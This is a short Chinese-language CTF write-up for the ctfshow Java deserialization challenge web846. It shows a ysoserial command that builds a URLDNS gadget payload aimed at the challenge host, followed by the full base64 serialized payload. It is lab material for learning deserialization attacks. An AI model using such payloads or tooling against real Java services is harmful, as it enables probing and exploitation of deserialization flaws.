本文最后更新于:2023年9月1日 上午
[TOC]
【java安全】ctfshow-java反序列化
web846
ctfshow会对你post提交的ctfshow参数进行base64解码
然后进行反序列化
构造出对当前题目地址的dns查询即可获得flag
直接使用URLDNS,我们可以使用ysoserial生成payload
1
2
3
| java -jar ysoserial.jar URLDNS "http://2ef37b64-c91d-4cb3-a4c3-9b259502d94a.challenge.ctf.show"| base64 -w 0
rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QANzJlZjM3YjY0LWM5MWQtNGNiMy1hNGMzLTliMjU5NTAyZDk0YS5jaGFsbGVuZ2UuY3RmLnNob3d0AABxAH4ABXQABGh0dHBweHQAPmh0dHA6Ly8yZWYzN2I2NC1jOTFkLTRjYjMtYTRjMy05YjI1OTUwMmQ5NGEuY2hhbGxlbmdlLmN0Zi5zaG93eA==
|
